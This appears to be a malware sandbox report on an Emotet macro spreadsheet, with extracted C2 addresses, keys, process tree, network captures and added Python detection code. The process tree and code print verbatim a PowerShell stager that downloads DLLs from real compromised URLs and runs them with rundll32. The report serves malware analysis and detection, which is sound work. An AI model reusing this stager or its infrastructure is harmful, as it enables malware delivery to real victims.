Resubmissions

  • 24/11/2021, 17:59 UTC: 211124-wk8rgsddbm (score 10/10)
  • 22/11/2021, 14:46 UTC: 211122-r5n6csagd6 (score 10/10)
  • 22/11/2021, 14:46 UTC: 211122-r5csbsfgdp (score 10/10)
  • 22/11/2021, 14:44 UTC: 211122-r4kfsafgdn (score 10/10)
  • 22/11/2021, 14:41 UTC: 211122-r2x9vsfgcq (score 10/10)
  • 22/11/2021, 14:20 UTC: 211122-rneklaffgr (score 10/10)
  • 22/11/2021, 14:15 UTC: 211122-rkk8zaffgl (score 10/10)
  • 17/11/2021, 06:51 UTC: 211117-hm1l1aeefm (score 10/10)
  • 17/11/2021, 06:37 UTC: 211117-hdnk3seedn (score 10/10)

Analysis

  • max time kernel
    27s
  • max time network
    26s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 14:44 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Family: emotet

Botnet: Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----

ecs1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----
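
The extracted config is the part of this report that turns into indicators, and the two PEM blobs deserve a sanity check before they are shipped: the `MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE` prefix is the DER header of a SubjectPublicKeyInfo holding an uncompressed prime256v1 (P-256) point, and Emotet's November 2021 rebuild uses the eck key for ECDH key agreement with the C2 and the ecs key to verify signed responses. The Python below is an added example, not tria.ge's code and not anything from the sample: it splits the C2 list, decodes each key with a minimal DER reader (standard library only), checks the two OIDs, and verifies that the point actually lies on P-256 using the public curve parameters, so a garbled or tampered key is rejected instead of being published as an IOC.

```python
import base64

# Config values copied from the tria.ge report above (Emotet, botnet Epoch4).
C2_LIST = """
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
"""

ECK1 = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----"""

ECS1 = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----"""

# OIDs expected inside the SubjectPublicKeyInfo: id-ecPublicKey and prime256v1.
OID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")
OID_PRIME256V1 = bytes.fromhex("2a8648ce3d030107")

# NIST P-256 field prime and curve coefficients (y^2 = x^3 + ax + b mod p).
P256_P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_A = P256_P - 3
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B


def parse_c2(text):
    """Split 'host:port' lines into (host, port) tuples, in config order."""
    return [(h, int(p)) for h, p in (line.rsplit(":", 1) for line in text.split())]


def der_tlv(buf, pos):
    """Read one DER tag-length-value at pos; returns (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_ec_spki(pem):
    """Decode a PEM SubjectPublicKeyInfo and return the P-256 point (x, y)."""
    b64 = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    der = base64.b64decode(b64)
    tag, spki, _ = der_tlv(der, 0)                 # SEQUENCE { algId, BIT STRING }
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    _, alg_id, pos = der_tlv(spki, 0)              # SEQUENCE { OID, OID }
    _, alg_oid, p2 = der_tlv(alg_id, 0)
    _, curve_oid, _ = der_tlv(alg_id, p2)
    if alg_oid != OID_EC_PUBLIC_KEY or curve_oid != OID_PRIME256V1:
        raise ValueError("not an id-ecPublicKey / prime256v1 key")
    tag, bits, _ = der_tlv(spki, pos)
    point = bits[1:]                               # first byte = unused-bit count
    if tag != 0x03 or bits[0] != 0 or len(point) != 65 or point[0] != 0x04:
        raise ValueError("expected a 65-byte uncompressed point")
    return int.from_bytes(point[1:33], "big"), int.from_bytes(point[33:], "big")


def on_curve(x, y):
    """True when (x, y) satisfies the P-256 equation, i.e. is a usable key."""
    return 0 <= x < P256_P and 0 <= y < P256_P and \
        (y * y - (x ** 3 + P256_A * x + P256_B)) % P256_P == 0


def validate_config():
    """Return the parsed C2 list and both key points, rejecting a bad key."""
    keys = {}
    for name, pem in (("eck1", ECK1), ("ecs1", ECS1)):
        x, y = parse_ec_spki(pem)
        if not on_curve(x, y):
            raise ValueError(f"{name}: point is not on P-256")
        keys[name] = (x, y)
    return parse_c2(C2_LIST), keys


if __name__ == "__main__":
    c2, keys = validate_config()
    print(f"{len(c2)} C2 servers, first {c2[0]}")
    for name, (x, y) in keys.items():
        print(f"{name}: valid P-256 point, x={x:064x}")
```

The on-curve check is the part worth keeping in a config extractor: a key that decodes but fails it is either a transcription error or an unpacker bug, and either way it should not be attached to the Epoch4 botnet in a threat-intel feed.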

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    The family name in this rule comes from the abuse.ch SSL Blacklist category the certificate fingerprint was listed under, not from the sample; the family identified in this run is Emotet.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The generic signature text calls this likely ransomware behaviour; the family in this run is Emotet, a loader, so this hit on its own is not evidence of encryption activity.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\240041168.dll,f1228091526
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\240041168.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc",LpFnwazG
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xckwcvpdfqtsymy\tchlvc.htc",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:1584
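
The process tree is the whole chain in one place: EXCEL.EXE runs cmd.exe, which starts PowerShell with an inline stager; the stager tries seven payload URLs in order, saves the first successful download as C:\ProgramData\<random>.dll, and runs it through the 32-bit rundll32.exe with a random export name (the ",f"+$r2 part); the loader then re-executes via Control_RunDLL and ends up as a .htc file in a randomly named directory under SysWOW64, still loaded by rundll32.exe. The Python below is an added example and not part of the tria.ge report: it pulls the URL list out of the recorded command line and runs four detection rules over process-creation events reconstructed from the PIDs and command lines above. The pid/ppid/image/cmdline field names are an assumption to adapt to your EDR schema, and EXCEL's own parent is not on the page, so it is given ppid 0.

```python
import re

# The PowerShell stager exactly as recorded in the process tree above; cmd.exe
# launched it as: "C:\Windows\System32\cmd.exe" /c start /B <this string>.
STAGER = r'''powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj'''

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUNDLL_ARG = re.compile(r'"?([A-Za-z]:\\[^",]+?)"?,([A-Za-z_]\w*)')   # <path>,<export>

# Process-creation events reconstructed from the report (field names assumed).
EVENTS = [
    {"pid": 2772, "ppid": 0, "image": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"'},
    {"pid": 2648, "ppid": 2772, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start /B ' + STAGER},
    {"pid": 3504, "ppid": 2648, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": STAGER},
    {"pid": 652, "ppid": 3504, "image": r"C:\Windows\SysWow64\rundll32.exe",
     "cmdline": r'"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\240041168.dll,f1228091526'},
    {"pid": 868, "ppid": 652, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\240041168.dll",Control_RunDLL'},
    {"pid": 1636, "ppid": 868, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc",LpFnwazG'},
    {"pid": 1584, "ppid": 1636, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xckwcvpdfqtsymy\tchlvc.htc",Control_RunDLL'},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def stager_summary(cmdline):
    """Pull the payload URL list, drop location and loader out of the stager."""
    return {
        # URLs sit in a comma-separated string that is later .Split(","); each
        # one ends at the next comma or at the closing \" of the string.
        "urls": re.findall(r'https?://[^,\\"\s]+', cmdline),
        "drops_to_programdata": "C:\\ProgramData\\" in cmdline,
        "loader": bool(re.search(r"SysWow64\\rundll32\.exe", cmdline, re.I)),
    }


def evaluate(events):
    """Apply four rules modelled on this chain; returns a list of (rule, pid)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        cl = e["cmdline"]
        # 1. Office application spawning a shell or script host (macro ran).
        if pimg in OFFICE_APPS and img in SCRIPT_HOSTS:
            hits.append(("office_spawns_shell", e["pid"]))
        # 2. PowerShell fetching to disk and running the result.
        if img == "powershell.exe" and re.search(r"Invoke-WebRequest|DownloadFile|IEX\b", cl, re.I) \
                and re.search(r"-OutFile\s+\S+", cl, re.I):
            hits.append(("powershell_download_stager", e["pid"]))
        # 3/4. rundll32 argument shape <path>,<export>.
        if img == "rundll32.exe":
            m = RUNDLL_ARG.search(cl)
            if m:
                path, export = m.group(1).lower(), m.group(2)
                if path.startswith("c:\\programdata\\"):
                    hits.append(("rundll32_loads_from_programdata", e["pid"]))
                    if re.fullmatch(r"f\d+", export):        # ",f"+$r2 from the stager
                        hits.append(("rundll32_random_export", e["pid"]))
                if not path.endswith(".dll") and ("\\system32\\" in path or "\\syswow64\\" in path):
                    hits.append(("rundll32_nondll_under_system32", e["pid"]))
    return hits


if __name__ == "__main__":
    print(stager_summary(STAGER)["urls"])
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:36} pid {pid}")
```

Rule 3 fires twice for this chain (PIDs 652 and 868) and rule 4 twice (1636 and 1584), which is the point: each stage of the loader is visible on the command line alone, before any memory or network evidence is needed.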

Network

  • Country: US
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    40.119.148.38
  • Country: US
    DNS
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • Country: EE
    GET
    https://evgeniys.ru/sap-logs/D6/
    powershell.exe
    Remote address:
    159.253.18.185:443
    Request
    GET /sap-logs/D6/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: evgeniys.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.20.1
    Date: Mon, 22 Nov 2021 14:45:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.3
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://evgeniys.ru/wp-json/>; rel="https://api.w.org/"
  • Country: US
    DNS
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • Country: US
    GET
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 22 Nov 2021 14:51:30 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Mon, 22 Nov 2021 14:51:31 GMT
    Content-Disposition: attachment; filename="aoSbYZ.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 619bae731beba=1637592691; expires=Mon, 22-Nov-2021 14:52:31 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Mon, 22 Nov 2021 14:51:31 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • Country: PL
    GET
    https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /gVVWWhivrlLduheNjiJteqqbVvI HTTP/1.1
    Cookie: sK=JK0DyJ+lJesh4UBLO13plyzG7CxmDTUqYYTQSc5Ee2apwR/Nh6YF+xTe3tzCQIbZoTvEhc4hYlrJFSs6MDkb8zKjSKuRkjxtVDfJ+/5EPHlRE28n66ahL7HwC79+QUzvQwuFbRicCCaBJO5A1Vd7dYYrjOKgq2pGEaciPGSlQ9ZtI08Z77/dNvq2EWQqZ2wEP6K+ChoPIRGTGOypGpyvYYn2LJC8zABS9mNK7KmVNmu+cHfRgV2/otCPuutHUeXF6iLBr2bK5yYtmVizonSA7gzVgmJtCymiKNx4pyKFRhbwNcnDl1I6lDn3WwzOrdwFL1QY4Csmx/QCmWKewzl0eJGS+gNmEyVcLxosRKiA2T9OdTRxLcTLbeA=
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 22 Nov 2021 14:45:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 159.253.18.185:443
    https://evgeniys.ru/sap-logs/D6/
    Protocols: tls, http
    Process: powershell.exe
    Sent: 1.3kB, Received: 29.4kB
    Packets: 18 sent, 25 received

    HTTP Request

    GET https://evgeniys.ru/sap-logs/D6/

    HTTP Response

    404
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    Protocols: http
    Process: powershell.exe
    Sent: 4.6kB, Received: 266.7kB
    Packets: 97 sent, 186 received

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI
    Protocols: tls, http
    Process: rundll32.exe
    Sent: 1.2kB, Received: 3.0kB
    Packets: 10 sent, 9 received

    HTTP Request

    GET https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    Protocols: dns
    Sent: 62 B, Received: 114 B
    Packets: 1 sent, 1 received

    DNS Request

    time.windows.com

    DNS Response

    40.119.148.38

  • 40.119.148.38:123
    time.windows.com
    Protocols: ntp
    Sent: 152 B, 2 packets (no received bytes recorded)
  • 8.8.8.8:53
    evgeniys.ru
    Protocols: dns
    Process: powershell.exe
    Sent: 57 B, Received: 73 B
    Packets: 1 sent, 1 received

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    crownadvertising.ca
    Protocols: dns
    Process: powershell.exe
    Sent: 65 B, Received: 81 B
    Packets: 1 sent, 1 received

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7
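
Three exchanges above are worth turning into network detections: the 404 from the first payload host (the stager simply falls through to the next URL), the 200 that delivers the loader as a .dll attachment with Content-Type application/x-msdownload from a /wp-includes/ path on a compromised WordPress site, fetched with the stock WindowsPowerShell User-Agent, and the first check-in from rundll32.exe, a GET to a bare IP on 443 with a random alphabetic path, no User-Agent, and the encrypted request carried in a single Cookie value. The Python below is an added example, not code from tria.ge: it parses the request and response heads copied from this page and applies both rules. The Cookie blob is only base64-decoded and measured; its contents are not interpreted, and the 64-byte floor is an assumed threshold, not a documented Emotet constant.

```python
import base64
import ipaddress
import re

# Request/response heads copied from the network section of this report
# (bodies omitted, headers as shown on the page).
REQ_FIRST = """GET /sap-logs/D6/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: evgeniys.ru
Connection: Keep-Alive"""
RESP_FIRST = """HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked"""

REQ_DLL = """GET /wp-includes/OxiAACCoic/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: crownadvertising.ca
Connection: Keep-Alive"""
RESP_DLL = """HTTP/1.1 200 OK
Server: Apache
Content-Disposition: attachment; filename="aoSbYZ.dll"
Content-Transfer-Encoding: binary
Content-Type: application/x-msdownload"""

REQ_C2 = """GET /gVVWWhivrlLduheNjiJteqqbVvI HTTP/1.1
Cookie: sK=JK0DyJ+lJesh4UBLO13plyzG7CxmDTUqYYTQSc5Ee2apwR/Nh6YF+xTe3tzCQIbZoTvEhc4hYlrJFSs6MDkb8zKjSKuRkjxtVDfJ+/5EPHlRE28n66ahL7HwC79+QUzvQwuFbRicCCaBJO5A1Vd7dYYrjOKgq2pGEaciPGSlQ9ZtI08Z77/dNvq2EWQqZ2wEP6K+ChoPIRGTGOypGpyvYYn2LJC8zABS9mNK7KmVNmu+cHfRgV2/otCPuutHUeXF6iLBr2bK5yYtmVizonSA7gzVgmJtCymiKNx4pyKFRhbwNcnDl1I6lDn3WwzOrdwFL1QY4Csmx/QCmWKewzl0eJGS+gNmEyVcLxosRKiA2T9OdTRxLcTLbeA=
Host: 91.200.186.228
Connection: Keep-Alive
Cache-Control: no-cache"""

WORDPRESS_DIRS = ("/wp-includes/", "/wp-content/", "/wp-admin/")
COOKIE_BLOB = re.compile(r"^[A-Za-z0-9]{1,4}=([A-Za-z0-9+/]+={0,2})$")


def parse_head(raw):
    """Split an HTTP head into (start-line fields, {lower-name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 2), headers


def is_bare_ipv4(host):
    """True when the Host header is a literal IPv4 address (optionally :port)."""
    try:
        return ipaddress.ip_address(host.rsplit(":", 1)[0]).version == 4
    except ValueError:
        return False


def is_staged_payload(req_raw, resp_raw):
    """Stock PowerShell UA fetching a PE served as a .dll/.exe attachment from a
    WordPress directory: the stager's second hop in this report."""
    (_, path, _), rq = parse_head(req_raw)
    (_, status, _), rs = parse_head(resp_raw)
    ps_ua = "windowspowershell/" in rq.get("user-agent", "").lower()
    wp_path = any(d in path for d in WORDPRESS_DIRS)
    pe_body = (rs.get("content-type", "").lower() == "application/x-msdownload"
               or re.search(r'filename="?[^";]+\.(dll|exe)', rs.get("content-disposition", ""), re.I))
    return status == "200" and ps_ua and wp_path and bool(pe_body)


def emotet_checkin(req_raw):
    """Emotet-style check-in: GET to a bare IP carrying one base64 Cookie blob.
    Returns (decoded blob length, number of supporting indicators) or None."""
    (method, path, _), h = parse_head(req_raw)
    m = COOKIE_BLOB.match(h.get("cookie", ""))
    if method != "GET" or m is None or not is_bare_ipv4(h.get("host", "")):
        return None
    try:
        blob = base64.b64decode(m.group(1), validate=True)
    except ValueError:                      # binascii.Error is a ValueError
        return None
    if len(blob) < 64:                      # assumed floor for a wrapped request
        return None
    supporting = sum([
        re.fullmatch(r"/[A-Za-z]{8,}", path) is not None,   # random alphabetic path
        "user-agent" not in h,                              # no UA header at all
    ])
    return len(blob), supporting


if __name__ == "__main__":
    print("first host payload:", is_staged_payload(REQ_FIRST, RESP_FIRST))
    print("crownadvertising payload:", is_staged_payload(REQ_DLL, RESP_DLL))
    print("C2 check-in:", emotet_checkin(REQ_C2))
```

The check-in rule keeps the bare-IP host and the single Cookie blob as hard requirements and treats the path shape and the missing User-Agent as supporting evidence, so a later build that adds a browser User-Agent still scores, just lower.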

MITRE ATT&CK Enterprise v6


Downloads

  • memory/652-340-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

  • memory/2772-123-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-125-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-124-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-118-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-122-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-121-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-120-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-119-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/3504-289-0x000002939D900000-0x000002939D902000-memory.dmp

    Filesize

    8KB

  • memory/3504-290-0x000002939D903000-0x000002939D905000-memory.dmp

    Filesize

    8KB

  • memory/3504-298-0x000002939D906000-0x000002939D908000-memory.dmp

    Filesize

    8KB

  • memory/3504-315-0x000002939D908000-0x000002939D909000-memory.dmp

    Filesize

    4KB
